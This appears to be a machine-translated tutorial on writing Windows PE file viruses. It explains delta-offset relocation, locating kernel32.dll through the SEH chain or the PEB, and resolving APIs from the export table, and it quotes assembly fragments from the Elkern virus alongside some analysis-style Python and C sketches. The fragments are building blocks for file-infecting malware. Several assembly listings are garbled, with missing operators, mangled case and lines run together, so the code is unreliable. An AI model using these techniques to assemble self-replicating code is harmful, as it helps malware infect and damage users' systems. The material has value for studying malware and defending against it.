Virus Programming Techniques

xiaoxiao, 2021-04-01

Whether you are a programmer or an ordinary computer user, life on the Internet is no longer unfamiliar. The network is more than a fast channel of communication; seen from another angle, it is also a breeding ground in which viruses spread. According to some statistics, an unpatched Windows system connected to the Internet will be infected by a worm or virus within 10 to 15 minutes. Viruses of all kinds spread quietly while people browse the network, exchange files, and play audio or video. During propagation these viruses and worms consume large amounts of bandwidth, interfere with normal system functions, cause data loss, and sometimes even damage hardware. Almost every computer user has had a system rendered unusable by a virus infection, and most enterprise users have seen business systems fail to run normally because of a virus attack. Viruses are never far from us. Yet faced with exaggerated reports and publicity, ordinary users find them both mysterious and frightening, and as computing becomes more segmented and specialized, even some professional programmers lack an in-depth understanding of them. A virus is simply a carefully designed program, but it is a concentrated expression of programming skill and optimization technique: a craft that challenges technical limits and stops at nothing. In fact, the optimizations and ingenious constructions found in virus code can be applied in certain special situations to simplify ordinary programming tasks. From another angle, only by fully understanding virus technology can we devise better countermeasures: know yourself and know your enemy, and you can fight a hundred battles without defeat.
Viruses are not peculiar to any one system. They exist on every popular operating system: from the original UNIX and its variants such as Linux, Solaris, and AIX, to OS/2, and from Windows to embedded systems such as Windows CE and Symbian. Even some specialized mainframe systems are no exception. The basic principles of viruses are similar across platforms, but the details differ with the characteristics of each system, because a technique that stops at nothing is bound to exploit system-specific features or weaknesses to obtain privileges and resources. Like living organisms, viruses are highly diverse: there are source code viruses, macro viruses, script viruses, and viruses tied to the executable file formats of particular systems. This article uses PE viruses under Windows, the most widely used operating system, as an example to explain the principles and implementation techniques of viruses and to dispel the fog that surrounds them.

* Viruses, worms, and malicious code

Traditional viruses are special code or programs that resemble biological viruses and have two basic features: self-replication and automatic propagation. Worms are generally considered a subclass of viruses, since they also replicate and propagate themselves, but because worms usually exploit system vulnerabilities rather than infect files, they are often treated as a class of their own. The usual criterion for distinguishing worms from traditional viruses is whether they rely on a host program to infect and spread: code that must attach itself to a host program is a virus. The definition is not absolute, however. Virus and worm techniques are increasingly combined, and the boundary is becoming ever more blurred.
Many viruses use worm propagation techniques, and worms no longer spread only through system vulnerabilities but also by infecting files. In addition, a considerable number of programs do not replicate or propagate themselves, yet run code the user never authorized and do things the user never permitted: spyware, malicious browser scripts, some advertising software, and so on. These clearly cannot be defined as traditional viruses or worms. Together with worms and viruses they belong to a larger category: malicious code. This article focuses on the techniques of traditional viruses.

* A brief history of viruses

Any discussion of virus technology cannot avoid the history of viruses.

As early as 1949, John von Neumann's paper "Theory and Organization of Complicated Automata" foresaw the possibility of self-propagating programs. The germ of today's viruses can be found in Core War, a game written by several gifted young programmers at AT&T Bell Labs, which already had some of the characteristics of a virus. Related experiments and research then began among scholars and talented programmers; the same talents who created computer systems also created computer viruses. It is hard to establish when and where the first real virus appeared, but in the 1980s, as personal computers became popular, viruses began to spread. Early viruses were closely tied to the file exchange methods and operating systems of the time: software was distributed and files exchanged mainly on floppy disks, systems ran UNIX or DOS, and networks were not yet widespread. Most viruses of this period were therefore boot sector viruses or file viruses. The former replace the boot sector code to gain execution at system start; the latter embed themselves in an executable file to gain control when it runs. Many viruses combined the two. With the spread of the IBM PC and MS-DOS, DOS viruses gradually came to dominate this period. In the late 1980s the Internet began to enter public view, and the first Internet worm, the Morris worm, appeared, spreading rapidly through the network by exploiting system vulnerabilities. As computers and networks became more widespread, virus technology also advanced considerably. This was driven largely by the growing prevalence of viruses and by progress in anti-virus software, which in turn stimulated virus writers' desire to create. Polymorphic and metamorphic techniques began to appear in order to defeat scanning by anti-virus software.
The absolute number of DOS viruses grew explosively, but with the rise of Windows in the late 1990s, DOS viruses and boot sector viruses gradually died out and Windows viruses emerged in large numbers. With the popularity of Microsoft Office, macro viruses and various script viruses also multiplied. The spread of the Internet increased the speed and reach of virus propagation; worms that spread by email began to increase, and email remains an important propagation path for worms today. In the first years of the 21st century, PE virus technology under Windows has matured and the number of PE viruses keeps growing, but the top places in the virus rankings have been taken over by worms that spread through system vulnerabilities. As security research deepens, the large number of disclosed vulnerabilities provides good material for worms; the amount of malware such as Trojans is growing geometrically; and virus authors' attention is extending from Windows desktop systems to UNIX systems and to embedded and mobile devices. Security research is attracting more and more public attention. The war between viruses and anti-virus software continues and will continue for the foreseeable future. Nevertheless, Windows PE file viruses still account for a very large proportion.

* The Windows platform and the PE file format

Windows is the most popular desktop platform today and also holds a considerable share of the server market. Its executable files (ordinary user programs, shared libraries, and driver files on NT systems) use the PE (Portable Executable) file format. To carry out its operations a virus generally calls the APIs provided by Windows, so readers are expected to be familiar with the basic APIs. To infect a host program a virus must modify its PE file, so readers also need some understanding of the PE file format. The PE format is complex and this article does not describe it in full; it introduces only what is needed, and readers who want more detail should consult the references [1] [2] [3]. The PE file structure and some of the header fields are shown in Figure 1 below. As Figure 1 shows, a PE file consists of a file header, a section table, and sections containing code and data. The file header defines the import table, the export table, the number of sections, the file version, the file size, the subsystem, and other related information. The section table defines the size and alignment of each section and how the file is mapped into memory. The sections that follow contain the actual executable code or data.

Figure 1 PE file structure and definitions of selected header fields
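To make the header layout concrete, the following is a minimal analysis-side sketch in Python that reads a few of the fields described above from a byte buffer. The function names `parse_pe_headers` and `make_sample_header` are hypothetical, the sample buffer is synthetic and not an executable file, and the offsets assume a 32-bit (PE32) optional header.

```python
import struct

def parse_pe_headers(data):
    """Read a few header fields from a PE32 image held in a bytes object."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # The doubleword at offset 0x3C holds the file offset of the PE header.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER (20 bytes) follows the 4-byte signature.
    machine, n_sections = struct.unpack_from("<HH", data, e_lfanew + 4)
    # IMAGE_OPTIONAL_HEADER32 follows the file header.
    opt = e_lfanew + 24
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)   # AddressOfEntryPoint
    (image_base,) = struct.unpack_from("<I", data, opt + 28)  # ImageBase
    return {"machine": machine, "sections": n_sections,
            "entry_rva": entry_rva, "image_base": image_base}

def make_sample_header():
    """Build a synthetic header buffer with made-up values for demonstration."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)           # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x84, 0x014C, 3)     # i386, 3 sections
    struct.pack_into("<H", buf, 0x98, 0x010B)         # PE32 magic
    struct.pack_into("<I", buf, 0x98 + 16, 0x1000)    # entry point RVA
    struct.pack_into("<I", buf, 0x98 + 28, 0x400000)  # preferred image base
    return bytes(buf)

if __name__ == "__main__":
    print(parse_pe_headers(make_sample_header()))
```

The entry point is stored as an RVA, so its address in a loaded image is the image base plus `entry_rva`; this is the field the following sections refer to as the PE entry point.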

* PE virus technology analysis

A typical PE virus modifies the target PE file: it writes the virus code into the file and updates the related header structures so that the modified file is still a valid PE file, then changes the PE entry point to the entry of the virus code. When the system loads the file, the virus code gains control first. After running its infection or payload code, it transfers control to the normal program code, so the virus runs quietly and unnoticed. The execution flow of an infected PE file is generally as shown in Figure 2:

Figure 2 Execution flow of an infected PE file

This is only the most common execution flow. As anti-virus technology has advanced, more viruses no longer take control at the program's entry point but gain control while the program is running or exiting, in order to escape the preliminary scan of anti-virus software. This technique is known as EPO (entry-point obscuring) and is described in the second half of this article. Virus code is generally divided into several functional modules: a decoding module, a relocation module, a file search module, an infection module, a payload module, an encryption and mutation module, and so on. Not every virus includes every module (decoding and encryption, for example, are optional), but nearly every PE virus has the file search and infection modules, because self-replication and self-propagation are the most basic features of a virus. Some viruses implement further modules, such as email propagation, network scanning, or in-memory infection. The execution flow of typical PE virus code is roughly as shown in Figure 3:

Figure 3 Execution flow of typical virus code

A virus is simple in principle, but implementing one involves many technical difficulties. Once these are solved, a virus complete in all its parts takes shape. This article introduces them from the perspective of a virus writer. The techniques a virus can use cover almost every aspect of Windows programming; for reasons of space they cannot all be described here, and this article concentrates on the techniques commonly used by Win32 user-mode viruses.

* Programming language

Any sufficiently powerful programming language can be used to write a PE virus, yet most PE viruses are written directly in assembly. On the one hand, assembled code is compact and can be fully optimized to meet the need for concealment. On the other hand, assembly is flexible and controllable: a virus has to deal with the low levels of the system and even with the hardware, and some operations that are awkward in a compiled high-level language, such as self-relocation, self-modifying code, and reading and writing I/O ports, are straightforward in assembly. With assembly the author can exploit every feature the underlying hardware supports, with very few restrictions. The main drawbacks of writing viruses in assembly are low productivity and the fact that the various optimizations make the code quite hard to read, but for so extreme a programming craft these seem not to matter. This article assumes that the reader is familiar with assembly language. The examples use Intel-syntax assembly and can be assembled with MASM or FASM. Because assembly is inconvenient to read, algorithms and principles are still presented in C. Some of the code discussed is taken from the source of the Elkern virus, which was widespread in 2002 and was published in issue 7 of the well-known virus magazine 29A; interested readers can refer to the complete code there.

* Relocation

Relocating itself is the most basic problem virus code must solve before it can run. Virus code needs to reference data such as API function names, a blacklist of anti-virus software, and system-specific data. The memory address at which the virus code will sit in the host process cannot be predicted when the assembly code is assembled, and it also varies from one infected host to another. The virus must therefore determine the addresses of its data dynamically at run time; otherwise references to that data will almost certainly fail. For an ordinary PE file such as a dynamic link library, the loader corrects addresses at load time according to a special structure in the PE file called the relocation table. The relocation table is generated at build time, so the library itself needs no extra handling. Virus code is different: it must determine the addresses of the data it references by itself. Suppose, for example, that virus code is loaded at 0x400000, and that an instruction at address 0x401000 and the data it references are defined as follows, with the addresses computed at build time on the assumption that the preferred base address is also 0x400000:

    401000: mov eax, dword ptr [402035]
            ...
    402035: db "Hello World!", 0

If the virus code is also loaded at base 0x400000 in the host, this obviously works. But if the code is loaded at base 0x500000, which is the situation a virus usually encounters, it fails at run time because the reference is still to 0x402035.
If this code ran not inside a host process but as a stand-alone PE file with a relocation table, the system loader would use the relocation entries to change the 0x402035 in DWORD PTR [402035] to 0x502035. The instruction would become MOV EAX, DWORD PTR [502035] and the program would run correctly. Unfortunately, virus code that runs inside another process must take additional measures and perform the relocation itself; otherwise the host process will not function properly.
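What the loader does with a relocation entry can be simulated on a plain byte buffer. The sketch below is only an illustration under simplifying assumptions: the hypothetical function `apply_relocations` takes a ready-made list of fixup offsets instead of parsing a real relocation table, and every fixup is treated as a 32-bit absolute address.

```python
import struct

def apply_relocations(image, fixup_offsets, preferred_base, actual_base):
    """Add (actual_base - preferred_base) to each 32-bit value listed in fixup_offsets."""
    delta = actual_base - preferred_base
    patched = bytearray(image)
    for offset in fixup_offsets:
        (value,) = struct.unpack_from("<I", patched, offset)
        struct.pack_into("<I", patched, offset, (value + delta) & 0xFFFFFFFF)
    return bytes(patched)

if __name__ == "__main__":
    # Opcode A1 is "mov eax, [moffs32]"; its 4-byte operand starts at offset 1.
    code = bytes([0xA1]) + struct.pack("<I", 0x402035)
    fixed = apply_relocations(code, [1], 0x400000, 0x500000)
    print(hex(struct.unpack_from("<I", fixed, 1)[0]))
```

With the example addresses from the text, the operand 0x402035 becomes 0x502035 when the image moves from 0x400000 to 0x500000, while the opcode byte is left untouched.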

There are at least two ways to solve the problem of relocation:

A) The first method constructs relocation entries, exploiting the PE relocation mechanism described above. When infecting the target PE file, the virus adds the addresses that need relocating to the target's relocation table. If the target has no relocation entries (for example, because it was linked with the MS linker's /FIXED option), the virus creates a relocation table and inserts new entries; if a relocation table already exists, the virus modifies it and inserts new entries containing these addresses. The relocation is then done entirely by the system loader when it loads the PE file. The relocation table is located through the sixth member (IMAGE_DIRECTORY_ENTRY_BASERELOC) of the DataDirectory array in the PE header. This method needs somewhat more code and is relatively complicated, and it is more troublesome still when the target file has no relocation entries (not uncommon, since they are often stripped to reduce file size). It is typically used only by viruses written in high-level languages and rarely by ordinary PE viruses.

B) The second method obtains the run-time address of the current instruction dynamically, using special instructions of the Intel x86 architecture such as call or fnstenv, and computes the difference between that address and the address fixed at build time. This difference is called the delta offset. Adding it to an original address gives the correct run-time address. On x86, the code keeps the delta offset in a register and addresses its data relative to that register, which solves the relocation of data. To continue the earlier example, if the instruction block is mapped at 0x500000, the code and its addresses in memory become:

    501000: mov eax, dword ptr [402035]
            ...
    502035: db "Hello World!", 0

Clearly the operand address referenced by the MOV instruction is wrong. If we know that the run-time address of the MOV instruction is 0x501000, we can compute its difference from the build-time address: 0x501000 - 0x401000 = 0x100000. The data actually referenced by the instruction should therefore be at 0x402035 + 0x100000 = 0x502035. As the example shows, as long as the run-time address of some instruction can be determined and its build-time address is known, any code or data address can be relocated correctly by adding the delta offset to it. The principle is shown in Figure 4:

Figure 4 Delta offset
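The arithmetic behind the delta offset can be checked with a few lines of Python. This is only a worked calculation using the example addresses from the text; the helper names `delta_offset` and `relocate` are hypothetical, and values are masked to 32 bits to mirror register arithmetic.

```python
MASK32 = 0xFFFFFFFF

def delta_offset(runtime_addr, build_addr):
    """Difference between where an instruction runs and where it was built to run."""
    return (runtime_addr - build_addr) & MASK32

def relocate(build_addr, delta):
    """Run-time address of any item whose build-time address is known."""
    return (build_addr + delta) & MASK32

if __name__ == "__main__":
    delta = delta_offset(0x501000, 0x401000)
    print(hex(delta))                      # delta offset
    print(hex(relocate(0x402035, delta)))  # run-time address of the string
```

The same two functions also cover the case where the code lands below its build-time address: the delta wraps around modulo 2^32, and the addition wraps back to the correct result.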

Usually it is enough to compute the delta offset at the start of the virus code and to write every data reference as an offset from it; the virus code is then guaranteed to be relocated correctly at run time. Suppose EBP contains the delta offset. The following addressing form ensures that the data address referenced at run time is correct:

    ; EBP contains the delta offset
    401000: mov eax, dword ptr [ebp + 0x402035]
            ...
    402035: db "Hello World!", 0

In source code, symbols can be used instead of hard-coded address values; the literal addresses above are what the assembler substitutes for the symbols. The problem now becomes how to obtain the delta offset. The obvious way is:

        call delta
    delta:
        pop ebp
        sub ebp, offset delta

This computes the delta offset at run time, because CALL pushes the address of the instruction that follows it onto the stack. After POP EBP executes, EBP holds the run-time address of delta; subtracting the build-time address of delta, "offset delta", yields the delta offset. Besides the obvious CALL instruction, the floating-point environment save instructions such as fstenv, fnstenv, fsave, and fxsave can also be used to obtain the run-time address of an instruction. Take FNSTENV as an example: it stores information about the most recently executed FPU instruction in a specified memory area, laid out as shown in Figure 5:

Figure 5 Structure of the floating-point environment block

The field at offset 12 of this structure is the run-time address of the last floating-point instruction executed, so the delta offset can also be obtained as follows:

    fpu_addr:
        fnop
        call GetPhaddr
        sub ebp, fpu_addr

    GetPhaddr:
        sub esp, 16
        fnstenv [esp-12]    ; the field at offset 12 lands at [esp]
        pop ebp             ; EBP = run-time address of the fnop at fpu_addr
        add esp, 12
        ret

The delta offset does not have to be kept in EBP. EBP is normally the stack frame pointer and is rarely used for anything else, so most virus authors habitually keep the delta offset there, but other registers work just as well. Optimized virus code often does not compute the delta offset explicitly at all. For example, the code at the beginning of Elkern is written as:

        call _start_ip
    _start_ip:
        pop ebp
        ; ...
        ; usage
        call [ebp + addrOpenProcess - _start_ip]
        ; ...
    addrOpenProcess dd 0

instead of:

        call _start_ip
    _start_ip:
        pop ebp
        sub ebp, _start_ip
        call [ebp + addrOpenProcess]

Why not write the code the second way? Although the first form is more cumbersome to write in source, addrOpenProcess - _start_ip is a small relative offset that generally needs no more than two bytes, so the generated instruction is short. addrOpenProcess by itself is a 32-bit address in a Win32 build environment, generally 4 bytes, so the generated instruction is longer. Because the size requirements on a virus are sometimes strict, and also to show off superb programming skill, virus authors use this optimization. Readers interested in how it works should consult the instruction format description in Volume 2 of the Intel manual.

* Obtaining API addresses

Once it can relocate itself, the virus can run its own code. But this is far from enough. Searching for files, reading and writing files, enumerating processes, and similar operations cannot realistically be reimplemented from scratch when the Win32 API already exists; doing so would be too large and too poorly compatible. Windows 9x, NT, 2000, XP, and 2003 all implement the same, highly compatible set of Win32 APIs, so a virus implements its functions by calling the Win32 API provided by the system. The problem to solve is how to obtain the addresses of the Win32 APIs dynamically. The earliest PE viruses hard-coded them. For example, if the address of CreateFileA on Windows 2000 is 0x7ee63260, the virus calls the API with call [7ee63260h]. The trouble is that API addresses are not the same across Windows versions, so a virus using this method might run only on one particular version of Windows 2000. Virus authors therefore went back to the PE structure to look for a solution. When the system loads a PE file, it stores the run-time addresses of the functions imported from each DLL in the PE file's import table. How does the system fill the import table with the correct addresses? It parses the export table of the imported DLL, looks up the RVA (relative virtual address) of each exported function by name or ordinal, and adds the DLL's actual load address in memory to the RVA to obtain the function's real run-time address. While studying how the operating system performs this dynamic linking of PE files, virus authors found the following two solutions:

A) When infecting a PE file, the virus searches the host's import table. If a function it needs is already imported, the virus's call to that API is pointed at the existing import table entry; if not, the virus modifies the import table to add an entry for the function and points its call at the new entry. When the host program starts, the system loader fills in the correct API addresses, and the virus code can call the functions directly.

B) Since the system can parse a DLL's export table, a virus can naturally obtain the API addresses it needs from the DLL in the same way. To parse a DLL's export table at run time, the virus must first obtain the DLL's actual load address in memory; only then can it locate the export table from the PE header information. Which DLL should be parsed first? kernel32.dll is loaded in almost every Win32 process and contains most of the commonly used APIs. In particular, its LoadLibrary and GetProcAddress APIs can obtain the address of any function exported by any DLL, and this has held on every Windows platform so far. So it is enough to obtain the base address at which kernel32.dll is loaded in the process and then parse its export table to get the addresses of the common APIs. If more are needed, LoadLibrary and GetProcAddress from kernel32.dll make it easy to obtain and call any function exported by any other DLL.

* Obtaining the kernel32.dll base address

The most common way to obtain the kernel32.dll base address is by searching: if the approximate address at which kernel32.dll is loaded is known, the base address can be found by searching from that address toward higher or lower addresses. Another method is to search the module list in the PEB structure on NT systems to get the exact load address of kernel32.dll. Let's look at the specific implementations:

Method 1: Brute-force search for the kernel32.dll base address

Early viruses started from a typical load address. The load address of kernel32.dll differs between Windows 9x, Windows 2000, and Windows XP and 2003 (0x77E60000 on the latter two), so on NT systems the search can start at 0x77E00000 and on 9x systems at 0xBFF00000, proceeding toward higher addresses. At the load address of kernel32.dll the header must begin with the "MZ" signature, and the PE header located by the doubleword at module offset 0x3C must begin with the "PE" signature, so these two signatures can be used to decide whether the load address has been found. One might think this unreliable, since other data could happen to match both signatures and yield a wrong base address, but in practice the test has proved very reliable. Note also that on every version of Windows the load address of kernel32.dll is aligned to 0x10000, so there is no need to search byte by byte; it is enough to test addresses on 64 KB boundaries. Searching from an approximate address may touch unmapped memory, so the search has to be combined with SEH. If there were a general way to obtain some address inside kernel32.dll on every version, the search could start from that address and proceed toward lower addresses, which would be more reliable and more general. Such a method exists. When the system has loaded a PE file and jumps to the first instruction at its entry point, the top of the stack holds an address inside kernel32.dll. Elkern uses this method:

    _start:
        pushfd                   ; if some flags, especially DF, are changed, some APIs can crash
        pushad
    _start_@1 equ $
        ; ...
        mov ebx, [esp + 9*4]     ; skip the 9 doublewords pushed by pushfd and pushad
        and ebx, 0FFE00000h      ; round down to an address below the kernel32.dll module,
                                 ; then search toward higher addresses; if a future Windows
                                 ; release changes the size or code layout of kernel32.dll,
                                 ; this method may fail

EBX now holds an address below the kernel32.dll base, and the following code can search upward from it for the base address. The drawback of this method is that the stack pointer value at program entry must be known or computable. That is possible for virus code that takes control at the program entry point, but the method does not work for viruses that use EPO. There is a more general way. During execution of a Win32 program the base of the FS segment register always points to the TEB of the current thread, and the first member of the TEB points to the SEH chain. Each node is an EXCEPTION_REGISTRATION structure, defined as follows:

    struct EXCEPTION_REGISTRATION {
        struct EXCEPTION_REGISTRATION *prev;
        void *handler;
    };

The handler member of the last node in the SEH chain points to the UnhandledExceptionFilter function in kernel32.dll. Using this feature we can write more general code:

        xor esi, esi
        lods dword [fs:esi]     ; get the head pointer of the SEH chain
    @@:
        inc eax                 ; last SEH node? (is prev 0xFFFFFFFF?)
        je @f
        dec eax
        xchg esi, eax
        lodsd                   ; next SEH node
        jmp near @b
    @@:
        lodsd                   ; address of UnhandledExceptionFilter in kernel32.dll

Some viruses use 0x7FFDE000 directly as the TEB pointer, because that value is fixed on NT systems earlier than Windows 2003 SP1 and Windows XP SP2, and hard-coding it does save a byte or two. Starting with Windows 2003 SP1 and Windows XP SP2, however, Windows maps the TEB dynamically for security reasons, so the TEB pointer is no longer fixed and this hard-coded approach has come to an end. Once an address inside kernel32.dll is known, the search proceeds toward lower addresses, as in the previous method, until the kernel32.dll base address is found.
The Elkern code that tests whether the kernel32.dll base address has been found is as follows:

    search_api_addr_@1:
        add ebx, 10000h
        jz short search_api_addr_seh_restore
        cmp word ptr [ebx], 'ZM'     ; MZ signature?
        jnz short search_api_addr_@1
        mov eax, [ebx + 3ch]
        add eax, ebx
        cmp word ptr [eax], 'EP'     ; PE signature?
        jnz short search_api_addr_@1
        ; base address of kernel32.dll found
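The signature test itself is the same check an analyst uses to locate module images in a memory dump. The following Python sketch applies it to a byte buffer rather than to live process memory; the names `has_pe_signatures`, `find_image_base`, and `build_mock_memory` are hypothetical, the buffer contents are made up, and out-of-range reads are handled by bounds checks instead of SEH.

```python
import struct

ALIGNMENT = 0x10000  # module images are aligned to 64 KB boundaries

def has_pe_signatures(mem, base):
    """True if mem[base:] starts with "MZ" and its PE header starts with "PE"."""
    if base + 0x40 > len(mem) or mem[base:base + 2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", mem, base + 0x3C)
    pe = base + e_lfanew
    return mem[pe:pe + 2] == b"PE"

def find_image_base(mem, start):
    """Test 64 KB-aligned offsets from start upward; return the first image base."""
    addr = start & ~(ALIGNMENT - 1)
    while addr < len(mem):
        if has_pe_signatures(mem, addr):
            return addr
        addr += ALIGNMENT
    return None

def build_mock_memory():
    """Synthetic buffer: an "MZ" decoy at 0x10000 and a header stub at 0x30000."""
    mem = bytearray(0x40000)
    mem[0x10000:0x10002] = b"MZ"                # decoy without a PE signature
    mem[0x30000:0x30002] = b"MZ"
    struct.pack_into("<I", mem, 0x3003C, 0x80)  # e_lfanew
    mem[0x30080:0x30082] = b"PE"
    return bytes(mem)

if __name__ == "__main__":
    print(hex(find_image_base(build_mock_memory(), 0x12345)))
```

Checking both signatures is what rejects the decoy at 0x10000, which illustrates why the article considers the two-signature test reliable in practice.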

Method 2: Walk the PEB structures to get the kernel32.dll base address

At offset 0x30 of the TEB mentioned above, that is, at address fs:[0x30], is an important pointer to the PEB (Process Environment Block). The PEB has many members and its full structure is not described here. It is enough to know that offset 0x0C of the PEB holds another important pointer, Ldr, which points to a PEB_LDR_DATA structure:

    typedef struct _PEB_LDR_DATA {
        ULONG Length;                                  // 0x00
        BOOLEAN Initialized;                           // 0x04
        PVOID SsHandle;                                // 0x08
        LIST_ENTRY InLoadOrderModuleList;              // 0x0c
        LIST_ENTRY InMemoryOrderModuleList;            // 0x14
        LIST_ENTRY InInitializationOrderModuleList;    // 0x1c
    } PEB_LDR_DATA, *PPEB_LDR_DATA;                    // 0x24

The last three members of this structure are the heads of three doubly linked lists of LDR_MODULE structures, which list the module information structures in load order, in memory address order, and in initialization order respectively.

The LDR_MODULE structure is as follows:

    typedef struct _LDR_MODULE {
        LIST_ENTRY InLoadOrderModuleList;              // 0x00
        LIST_ENTRY InMemoryOrderModuleList;            // 0x08
        LIST_ENTRY InInitializationOrderModuleList;    // 0x10
        PVOID BaseAddress;                             // 0x18
        PVOID EntryPoint;                              // 0x1c
        ULONG SizeOfImage;                             // 0x20
        UNICODE_STRING FullDllName;                    // 0x24
        UNICODE_STRING BaseDllName;                    // 0x2c
        ULONG Flags;                                   // 0x34
        SHORT LoadCount;                               // 0x38
        SHORT TlsIndex;                                // 0x3a
        LIST_ENTRY HashTableEntry;                     // 0x3c
        ULONG TimeDateStamp;                           // 0x44
    } LDR_MODULE, *PLDR_MODULE;                        // 0x48

PEB->Ldr->InInitializationOrderModuleList points to the first LDR_MODULE node in initialization order. On the WinNT platform (not Win9x), the LDR_MODULE of this first node describes ntdll.dll, and the next node in the list describes kernel32.dll. Isn't the BaseAddress in that node's LDR_MODULE exactly what we have been working so hard to find? Note that InInitializationOrderModuleList is the third member of LDR_MODULE, at offset 0x10, so BaseAddress (offset 0x18) is reached by adding 8 to the list pointer and dereferencing. The following assembly code therefore obtains the base address of kernel32.dll:

MOV EAX, DWORD PTR FS: [30H]; Get the PEB base MOV EAX, DWORD PTR [EAX 0CH]; get the peb_ldr_data structure pointer MOV ESI, DWORD PTR [EAX 1CH]; get the first LDR_Module node of the INITIALIZATIONORDERMODULELIST linker IninitializationOrderModuleList member's pointer Lodsd; get the two-way linked list of the pointer MOV EBX, DWORD PTR [EAX 08H]; Take the base address, the structure is currently included; kernel32.dll related information This method is in all Windows NT (Including Windows 2003 SP1 and Windows XP SP2) The operating system is valid. The only shortcomings are due to the difference in the PEB structure, which is invalid on the Win9x system. It may be more clear and more clearly listening to a picture:

Figure 6. Using the PEB to locate the kernel32.dll base address

Export function table

The export mechanism of the PE file is an important mechanism for dynamic calls between modules. For normal programs, the related work is completed automatically by the system loader before the program runs and is transparent to the user program. However, to resolve function addresses dynamically in virus code, in place of the loader, it is necessary to understand the structure of the export table. As Figure 1 shows, the IMAGE_OPTIONAL_HEADER32 structure in the PE header contains a DataDirectory array of 16 members, each of which is an IMAGE_DATA_DIRECTORY structure:

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD VirtualAddress;
    DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

Each entry of the DataDirectory array points to an important data structure: the first member (index 0) points to the export table, and the second member (index 1) points to the import table of the PE file. The export table pointed to by the first DataDirectory member is an IMAGE_EXPORT_DIRECTORY structure:

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD Characteristics;
    DWORD TimeDateStamp;
    WORD MajorVersion;
    WORD MinorVersion;
    DWORD Name;
    DWORD Base;
    DWORD NumberOfFunctions;
    DWORD NumberOfNames;
    DWORD AddressOfFunctions;    // RVA from base of image
    DWORD AddressOfNames;        // RVA from base of image
    DWORD AddressOfNameOrdinals; // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

AddressOfFunctions points to a DWORD array that contains the RVAs of all exported functions. AddressOfNames points to a DWORD array of RVAs, each pointing to the string of an exported function name. AddressOfNameOrdinals points to a WORD (16-bit) array that runs parallel to the AddressOfNames array: for each name it gives the ordinal of the corresponding exported function, and that ordinal can be used directly as an index into the AddressOfFunctions array to get the address of the exported function.
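The relationship between the three arrays can be illustrated with a small, portable sketch. It is not taken from the article: the function name `lookup_export_rva` and its parameters are hypothetical, and the arrays are assumed to have already been read out of a PE image (for example by an inspection tool) rather than accessed through RVAs.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: map an exported name to its RVA.
 * names         - strings referenced by AddressOfNames
 * name_ordinals - the parallel AddressOfNameOrdinals array
 * functions     - the AddressOfFunctions array (RVAs)
 * Returns 0 when the name is not present or the index is out of range. */
uint32_t lookup_export_rva(const char *const *names,
                           const uint16_t *name_ordinals,
                           const uint32_t *functions,
                           uint32_t number_of_names,
                           uint32_t number_of_functions,
                           const char *wanted)
{
    assert(names && name_ordinals && functions && wanted);
    for (uint32_t i = 0; i < number_of_names; i++) {
        if (strcmp(names[i], wanted) == 0) {
            /* Same position i in the ordinal array gives the function index. */
            uint16_t index = name_ordinals[i];
            if (index >= number_of_functions)
                return 0;
            return functions[index];
        }
    }
    return 0;
}
```

With names {"Alpha", "Beta"}, ordinals {1, 0} and functions {0x1000, 0x2000}, looking up "Alpha" yields 0x2000; adding the image base to that RVA would give the runtime address.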
Therefore, a virus searches for a specified API in the following steps:

a) Get the value of NumberOfNames and the addresses of the AddressOfNames, AddressOfNameOrdinals, and AddressOfFunctions arrays.
b) Search the AddressOfNames array, comparing each name with the wanted API name. If the API is found, go to d). If not all NumberOfNames names have been searched, repeat b).
c) If all names have been searched without a match, the API is not exported. This step is usually omitted, because we already know that the DLL definitely exports the function.
d) Take the index of the matching name pointer in the AddressOfNames array, use it to read the function ordinal from the AddressOfNameOrdinals array, use that ordinal as an index into the AddressOfFunctions array to read the RVA of the exported function, and add the module base address to obtain the runtime address.

This may look roundabout, but it is the price the PE design pays for flexibility. It is still relatively simple, usually fewer than 100 bytes of compiled code. The following is complete code to obtain the address of GetProcAddress in kernel32:

Push ESI; ESI = VA KERNEL32.BASE; EDI = RVA K32.PEHDR MOV EBP, ESI MOV EDI, [EBP EDI Peh.DataDirectory]

Push EDI ESI

MOV EAX, [EBP EDI peexc.addressofnames] MOV EDX, [EBP EDI peexc.addressofNameordinals] Call @f DB "getProcaddress", 0 @@: Pop Edi Mov ECX, 15 SUB EAX, 4 Next_: Add Eax 4 Add EDI, ECX SUB EDI, 15 MOV ESI, [EBP ESI] Add ESI, EBP MOV ECX, 15 REPZ CMPSB; Specific string comparison, determine if the function to find JNZ next_

POP ESI EDI

Sub Eax, [EBP EDI peexc.addressofnames] SHR EAX, 1 Add Edx, EBP MOVZX EAX, WORD [EDX EBP] Add ESI, [EBP EDI Peexc.Addressoffunctions] Add EBP, [ESI EAX * 4 ]; EBP = kernel32.getProcaddress.addr; Use get ketdress and hModule to get other func pop esi; ESI = kernel32 base

The code above finds the API by parsing the export table and comparing function-name strings directly. Alternatively, a hash of each function name can be computed and compared with the precomputed hash of the wanted API. Modern PE viruses mostly use the hash method. The reason is that function names are generally longer than 4 bytes, while a hash takes only 4 or 2 bytes, which saves space; it may also hinder analysis, because a hash is less obvious than a name string. The hash algorithm only has to guarantee that there are no collisions, and mature algorithms such as CRC can be used. Elkern uses the CRC16 algorithm.

* File search

